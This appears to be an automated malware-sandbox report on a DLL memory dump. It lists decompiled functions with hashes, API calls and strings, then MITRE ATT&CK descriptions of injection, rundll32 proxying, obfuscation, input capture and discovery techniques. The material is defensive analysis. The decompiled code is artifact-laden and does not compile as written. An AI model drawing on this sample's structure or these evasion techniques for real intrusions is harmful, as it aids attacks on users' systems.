Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: d55663382e8ffb2a093fbecb17494f80993ee5d375c174dc2797d58bec4a8831
Instruction ID: 99535655bb7719abe08a38ebaafcc9c5b9e3b678d617408a2a5f39da70783701
Opcode Fuzzy Hash: d55663382e8ffb2a093fbecb17494f80993ee5d375c174dc2797d58bec4a8831
Instruction Fuzzy Hash: 2421F732A54306A6E7A4CF68C950F97736AABC5F65F628424E909D7304E772DD018F90

Uniqueness

Uniqueness Score: -1.00%

Function 6D49FAE9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D49FAE9(void* __ebx, void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t49;
				signed int _t55;

				if( *0x6d546e51 == 0) {
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t19 = E6D4A079B();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6d54506c; // 0xff2bc58a
							_push(_t49);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6d54506c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t55;
							if(_t55 != 0) {
								goto L9;
							} else {
								_t25 = E6D4CA8CA(_t19, 0x6d546e54);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6D4CA8CA(_t25, 0x6d546e60);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6d546e51 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t55 - 1;
						if(_t55 != 1) {
							E6D4A07A7(__edx, _t49, _t55, 5);
							asm("int3");
							E6D4A0990(__ebx, _t49, 0x6d542780, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6d460000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6d46003c; // 0x100
								__eflags =  *((intOrPtr*)(_t31 + 0x6d460000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6d460000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6d460018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6d460018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6D49F931(0x6d460000, _a4 - 0x6d460000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

0x6d49faf6
0x6d49fafd
0x6d49fb00
0x6d49fb02
0x6d49fb09
0x6d49fb09
0x6d49fb0e
0x6d49fb10
0x6d49fb38
0x6d49fb38
0x6d49fb40
0x6d49fb49
0x6d49fb51
0x6d49fb53
0x6d49fb53
0x6d49fb59
0x6d49fb5c
0x6d49fb5f
0x6d49fb62
0x6d49fb63
0x6d49fb64
0x6d49fb6a
0x6d49fb6d
0x6d49fb73
0x6d49fb76
0x6d49fb77
0x6d49fb78
0x00000000
0x6d49fb12
0x6d49fb12
0x6d49fb14
0x00000000
0x6d49fb16
0x6d49fb1b
0x6d49fb21
0x6d49fb23
0x6d49fb34
0x6d49fb34
0x6d49fb25
0x6d49fb2a
0x6d49fb30
0x6d49fb32
0x6d49fb7a
0x6d49fb7a
0x6d49fb81
0x00000000
0x00000000
0x00000000
0x6d49fb32
0x6d49fb23
0x6d49fb14
0x6d49fb85
0x6d49fb04
0x6d49fb04
0x6d49fb07
0x6d49fb88
0x6d49fb8d
0x6d49fb95
0x6d49fb9a
0x6d49fba3
0x6d49fbaa
0x6d49fc09
0x6d49fc09
0x6d49fc10
0x6d49fc10
0x6d49fbac
0x6d49fbac
0x6d49fbb1
0x6d49fbbb
0x00000000
0x6d49fbbd
0x6d49fbc2
0x6d49fbc9
0x00000000
0x6d49fbcb
0x6d49fbd7
0x6d49fbde
0x6d49fbe0
0x00000000
0x6d49fbe2
0x6d49fbe2
0x6d49fbe6
0x00000000
0x6d49fbe8
0x6d49fbe8
0x6d49fbef
0x6d49fbef
0x6d49fbe6
0x6d49fbe0
0x6d49fbc9
0x6d49fbbb
0x6d49fc15
0x6d49fc21
0x00000000
0x00000000
0x00000000
0x6d49fb07
0x6d49faf8
0x6d49fafb
0x6d49fafb

Strings

TnTm, xrefs: 6D49FB44
`nTm, xrefs: 6D49FB65

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: TnTm$`nTm
API String ID: 0-3487332901
Opcode ID: 62e374ab9638bee965c5ef6f1d07fc7794671a0c6456998c19670cd54d7981d0
Instruction ID: df8c7190e2aa9be9e8ed552d927957bc4a23c042278cf872f3853cad4a17573b
Opcode Fuzzy Hash: 62e374ab9638bee965c5ef6f1d07fc7794671a0c6456998c19670cd54d7981d0
Instruction Fuzzy Hash: 3A11C176C06715AACF01DEAA8400BDF7BE55B02328F25805AEA10EF680D7B18D458BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D484197, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6D484197(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t23;
				void* _t25;
				char* _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t58;
				char* _t59;
				void* _t61;
				void* _t62;

				_t56 = __edi;
				_t54 = __edx;
				_t44 = __ebx;
				E6D4A00E0(0x6d4e80c1, __ebx, __edi, __esi, 0x70);
				_t23 =  *0x6d55ce68; // 0x1
				_t58 =  *((intOrPtr*)(_t61 + 8));
				if(_t23 == 0) {
					_push(1);
					 *0x6d55ce68 = 1;
					E6D483751(__ebx, _t61 - 0x60, __edi, _t58);
					 *0x6d55ce70 =  *((intOrPtr*)(_t61 - 0x60));
					 *0x6d55ce74 =  *((intOrPtr*)(_t61 - 0x5c));
					_t23 =  *0x6d55ce68; // 0x1
				}
				if(_t23 != 1) {
					_t25 = E6D481F9A(_t61 - 0x40, E6D4850B4());
					 *(_t61 - 4) = 1;
					_push(E6D4840E5(_t61 - 0x58, __eflags, _t25));
					 *(_t61 - 4) = 2;
					E6D480BC1(_t44, _t61 - 0x7c, _t56, _t58, __eflags);
					_pop(_t49);
					E6D4A3D74(_t61 - 0x7c, 0x6d54347c);
					asm("int3");
					__eflags = 0;
					_push(_t58);
					_t59 = _t49;
					 *_t59 = 0;
					 *((intOrPtr*)(_t59 + 8)) = 0;
					 *((intOrPtr*)(_t59 + 0xc)) = 0;
					E6D485DAB(_t49,  *((intOrPtr*)(_t62 + 4)));
					return _t59;
				} else {
					E6D481F9A(_t61 - 0x28, _t58);
					 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
					_t51 =  *0x6d55ce70; // 0x4e6020
					E6D485C7E(_t51, _t54, _t61 - 0x60, _t61 - 0x28);
					E6D482B76(_t61 - 0x28);
					return E6D4A008A( *((intOrPtr*)(_t61 - 0x60)) + 0x28, _t44, _t56, _t58);
				}
			}

0x6d484197
0x6d484197
0x6d484197
0x6d48419e
0x6d4841a3
0x6d4841a8
0x6d4841ad
0x6d4841af
0x6d4841b4
0x6d4841bb
0x6d4841c3
0x6d4841cb
0x6d4841d0
0x6d4841d0
0x6d4841d7
0x6d484218
0x6d484221
0x6d48422d
0x6d484231
0x6d484235
0x6d48423b
0x6d484245
0x6d48424a
0x6d48424f
0x6d484251
0x6d484252
0x6d484254
0x6d484256
0x6d484259
0x6d48425c
0x6d484264
0x6d4841d9
0x6d4841dd
0x6d4841e2
0x6d4841e9
0x6d4841f4
0x6d4841fc
0x6d48420c
0x6d48420c

APIs

__EH_prolog3_GS.LIBCMT ref: 6D48419E

Part of subcall function 6D483751: __EH_prolog3_GS.LIBCMT ref: 6D483758

Part of subcall function 6D481F9A: _strlen.LIBCMT ref: 6D481FAF

Part of subcall function 6D480BC1: __EH_prolog3_GS.LIBCMT ref: 6D480BC8

__CxxThrowException@8.LIBVCRUNTIME ref: 6D484245

Part of subcall function 6D4A3D74: RaiseException.KERNEL32(00000000,?,uHm,00000000,?,?,?,?,?,?,?,6D4875E7,00000000,6D5414C0,?), ref: 6D4A3DD4

Strings

`N, xrefs: 6D4841C3, 6D4841E9

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_$ExceptionException@8RaiseThrow_strlen
String ID: `N
API String ID: 2104475553-865441986
Opcode ID: 111598d0d8deeef80c0d4c7ba8b66c9fa05cb7df5b91f2de4d31765eec9d4bdb
Instruction ID: 6797f3bdebc958297af5b951fb3bc99b6c5158d23f00e695606cfa880f118e1e
Opcode Fuzzy Hash: 111598d0d8deeef80c0d4c7ba8b66c9fa05cb7df5b91f2de4d31765eec9d4bdb
Instruction Fuzzy Hash: EB21A1728082589FCF02DFA4C848FEDB7B8AF2A344F16401ED645A7246DB709D85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4859F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 6D485A52

Strings

:BHm, xrefs: 6D485A35
[json.exception., xrefs: 6D4859FC

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Deallocate
String ID: :BHm$[json.exception.
API String ID: 1075933841-1843382348
Opcode ID: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
Instruction ID: 51db2556010404d0d9e780f905768e175234eb674d0bf2a4a03e0a6c27aa6330
Opcode Fuzzy Hash: 73070045c6a03cc72ffc51eff2711fc59ea7826efa6840d5c99e4c2a4cf639f8
Instruction Fuzzy Hash: BD0161B26082116F8318DF58D8C0C1BB7EDEB9A294711466DFA6AC7246EB31ED05C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D483751, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6D483751(void* __ebx, signed int* __ecx, signed char* __edi, void* __esi) {
				signed int _t18;
				void* _t25;
				signed char _t26;
				intOrPtr* _t27;
				signed char _t37;
				signed char _t41;
				void* _t43;
				signed char _t48;
				void* _t49;
				intOrPtr* _t50;

				E6D4A00E0(0x6d4e8012, __ebx, __edi, __esi, 0x38);
				_t48 = __ecx;
				_t41 =  *((intOrPtr*)(_t49 + 8));
				_t18 = _t41 & 0x000000ff;
				if(_t18 > 8) {
					 *__ecx =  *__ecx & 0x00000000;
					__eflags = _t41;
					if(_t41 != 0) {
						goto L4;
					} else {
						E6D481F9A(_t49 - 0x28, "961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1");
						 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
						_t43 = _t49 - 0x44;
						E6D480C7C(__ebx, _t43, __edi, _t48, __eflags);
						 *_t50 = 0x6d543430;
						_t25 = E6D4A3D74(_t49 - 0x44, _t49 - 0x28);
						asm("scasb");
						asm("aaa");
						_t26 = _t25 - 1;
						__eflags = _t26;
						asm("insd");
						if(_t26 >= 0) {
							_t27 =  *((intOrPtr*)(_t50 + 4));
							 *_t27 =  *((intOrPtr*)(_t43 + 4));
							return _t27;
						} else {
							asm("insd");
							 *__edi =  *__edi ^ 0x00000048;
							asm("insd");
							 *__edi = _t48;
							asm("insd");
							asm("aaa");
							asm("insd");
							asm("pushfd");
							asm("aaa");
							asm("insd");
							asm("pushfd");
							asm("aaa");
							asm("insd");
							asm("movsd");
							asm("aaa");
							asm("insd");
							asm("aaa");
							asm("insd");
							_t37 =  *((intOrPtr*)(_t43 + 4)) - 0x10;
							__eflags = _t37;
							return _t37;
						}
					}
				} else {
					switch( *((intOrPtr*)(_t18 * 4 +  &M6D4837E9))) {
						case 0:
							 *__esi =  *__esi & 0x00000000;
							goto L4;
						case 1:
							_t38 = E6D484B1C(__ebx, __edi, __ecx, _t51);
							goto L3;
						case 2:
							__eax = E6D484B64(__eflags);
							goto L3;
						case 3:
							__eax = E6D484B87(__ebx, __edi, __esi, __eflags);
							goto L3;
						case 4:
							 *__esi = 0;
							goto L4;
						case 5:
							 *__esi =  *__esi & 0x00000000;
							__esi[1] = __esi[1] & 0x00000000;
							goto L4;
						case 6:
							asm("xorps xmm0, xmm0");
							asm("movsd [esi], xmm0");
							goto L4;
						case 7:
							__eax = E6D484BCF(__eflags);
							L3:
							 *_t48 = _t38;
							L4:
							return E6D4A008A(_t48, _t39, _t45, _t48);
							goto L16;
					}
				}
				L16:
			}

0x6d483758
0x6d48375d
0x6d48375f
0x6d483762
0x6d483768
0x6d4837b3
0x6d4837b6
0x6d4837b8
0x00000000
0x6d4837ba
0x6d4837c2
0x6d4837c7
0x6d4837cf
0x6d4837d2
0x6d4837da
0x6d4837e2
0x6d4837e9
0x6d4837ea
0x6d4837eb
0x6d4837eb
0x6d4837ec
0x6d4837ed
0x6d483826
0x6d48382d
0x6d48382f
0x6d4837ef
0x6d4837f0
0x6d4837f1
0x6d4837f4
0x6d4837f5
0x6d4837f8
0x6d4837fa
0x6d4837fc
0x6d4837fd
0x6d4837fe
0x6d483800
0x6d483801
0x6d483802
0x6d483804
0x6d483805
0x6d483806
0x6d483808
0x6d48380a
0x6d48380c
0x6d483810
0x6d483810
0x6d483813
0x6d483813
0x6d4837ed
0x6d48376a
0x6d48376a
0x00000000
0x6d4837ae
0x00000000
0x00000000
0x6d483771
0x00000000
0x00000000
0x6d483782
0x00000000
0x00000000
0x6d483789
0x00000000
0x00000000
0x6d483797
0x00000000
0x00000000
0x6d48379c
0x6d48379f
0x00000000
0x00000000
0x6d4837a5
0x6d4837a8
0x00000000
0x00000000
0x6d483790
0x6d483776
0x6d483776
0x6d483778
0x6d48377f
0x00000000
0x00000000
0x6d48376a
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 6D483758
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4837E2

Strings

961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1, xrefs: 6D4837BA

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8H_prolog3_Throw
String ID: 961c151d2e87f2686a955a9be24d316f1362bf21 3.9.1
API String ID: 2985221223-1287915644
Opcode ID: eeb13f83dfdacb4ab95cbfc0b6b0282fd593f1ccfc59d4e9750cd4e0ce1cccaa
Instruction ID: 6c5b6a0e410e4f06587b21a6f7e1cf9dcb8a2275f138da4a986c6dc33cd7411f
Opcode Fuzzy Hash: eeb13f83dfdacb4ab95cbfc0b6b0282fd593f1ccfc59d4e9750cd4e0ce1cccaa
Instruction Fuzzy Hash: E9016DB1C6C245ABEB01DF64C449FADB2E4AF263E6F25C51E9180D2046DB78CD86C792

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D4B79, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4D4B79(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E6D4B1F60(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E6D4C2281())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E6D4C2281())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E6D4D8CAB(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6D4C2281())) = 0x16;
					return E6D4C215B() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x6d4d4b79
0x6d4d4b82
0x6d4d4b87
0x6d4d4b8a
0x6d4d4b8e
0x6d4d4b9d
0x6d4d4ba0
0x6d4d4bc0
0x6d4d4bc5
0x6d4d4bc8
0x6d4d4bca
0x6d4d4c98
0x6d4d4c9e
0x6d4d4cb3
0x6d4d4cbf
0x6d4d4cc5
0x6d4d4cc7
0x6d4d4cd6
0x6d4d4cd6
0x6d4d4cd6
0x6d4d4cd9
0x6d4d4cd9
0x6d4d4cdd
0x6d4d4cdf
0x6d4d4ce2
0x6d4d4ce2
0x6d4d4ce2
0x6d4d4ce2
0x00000000
0x6d4d4ce9
0x6d4d4cce
0x00000000
0x6d4d4cce
0x6d4d4ca0
0x6d4d4ca3
0x6d4d4ca3
0x6d4d4ca6
0x6d4d4ca6
0x6d4d4ca8
0x6d4d4ca9
0x6d4d4ca9
0x6d4d4cad
0x00000000
0x6d4d4cad
0x6d4d4bd0
0x6d4d4bd6
0x6d4d4c03
0x6d4d4c0f
0x6d4d4c15
0x6d4d4c17
0x00000000
0x00000000
0x6d4d4c1d
0x6d4d4c23
0x6d4d4c26
0x6d4d4c82
0x6d4d4c87
0x6d4d4c8f
0x00000000
0x6d4d4c8f
0x6d4d4c28
0x6d4d4c2b
0x6d4d4c2d
0x6d4d4c30
0x6d4d4c32
0x6d4d4c34
0x6d4d4c6a
0x6d4d4c78
0x6d4d4c7e
0x6d4d4c80
0x6d4d4c94
0x00000000
0x6d4d4c94
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4d4c36
0x6d4d4c36
0x6d4d4c36
0x6d4d4c39
0x6d4d4c3c
0x6d4d4c3e
0x00000000
0x00000000
0x6d4d4c48
0x6d4d4c4f
0x6d4d4c52
0x6d4d4c54
0x6d4d4c5c
0x6d4d4c5c
0x6d4d4c5f
0x6d4d4c60
0x6d4d4c63
0x6d4d4c65
0x00000000
0x00000000
0x00000000
0x6d4d4c65
0x6d4d4c56
0x6d4d4c57
0x6d4d4c5a
0x00000000
0x00000000
0x00000000
0x6d4d4c5a
0x6d4d4c67
0x00000000
0x6d4d4c67
0x6d4d4bd8
0x6d4d4bda
0x00000000
0x00000000
0x6d4d4be0
0x6d4d4be3
0x6d4d4be7
0x6d4d4bea
0x6d4d4bee
0x00000000
0x00000000
0x6d4d4bf4
0x6d4d4bf5
0x6d4d4bf8
0x6d4d4bfa
0x00000000
0x00000000
0x00000000
0x6d4d4bfc
0x00000000
0x6d4d4be3
0x6d4d4ba7
0x00000000
0x6d4d4bb2
0x6d4d4b94
0x6d4d4b9a
0x00000000
0x6d4d4b9a
0x6d4d4cf1

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,43D0C569,43D0C569,00000000,00000000,00000000,00000000,00000000), ref: 6D4D4C0F
GetLastError.KERNEL32 ref: 6D4D4C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6D4D4C78

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 673ad19ea6e6b01e131d4a73b554ebbe1a51f690d90bb935ddbc8d3cb0c759bc
Instruction ID: 1b6f1bec72e5e2ac0ad2a31e9687a3c0026e587f04c68e364f66258a554262cb
Opcode Fuzzy Hash: 673ad19ea6e6b01e131d4a73b554ebbe1a51f690d90bb935ddbc8d3cb0c759bc
Instruction Fuzzy Hash: 7841F835604207AFDB51CF64C894F7A7BB4EF0ABA0F228169E95D97290DB318D01CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
